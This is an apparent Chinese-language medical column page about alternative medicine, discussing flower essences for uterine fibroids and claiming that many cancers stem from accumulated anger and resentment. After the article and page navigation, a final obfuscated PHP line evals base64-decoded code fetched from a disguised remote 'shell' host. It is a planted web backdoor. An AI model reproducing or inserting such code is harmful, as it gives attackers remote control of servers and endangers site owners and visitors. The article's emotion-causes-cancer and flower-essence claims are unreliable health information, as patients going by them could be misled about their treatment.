收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 改變情緒就能健康
改變情緒就能健康 列印 E-mail
        子宮肌瘤生成的原因有很多,並不是每一個肌瘤患者使用花精後,都能得到肌瘤變小甚至消失的效果。國內外很多臨床經驗告訴我們,癌症很多是與長年累積的情緒障礙有關,尤以憤怒、怨恨為主要的原因。

癌症的治療有其急迫性,我並不主張拿另類醫學來做為癌症的第一線治療方法,不是我否定另類醫學的價值,也不是我認為主流醫學就一定是對的,只是現今醫病關係非常脆弱,令人感傷!

但是良性腫瘤的治療比較沒有急迫性,所以我們可以嘗試不同的醫療模式;如果能在治療疾病的同時又能有附加價值,改善患者情緒及人生觀,相信那是所有為醫者衷心期盼的理想。只是所有的醫療行為、過程與結果,仍需視個案來評估。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));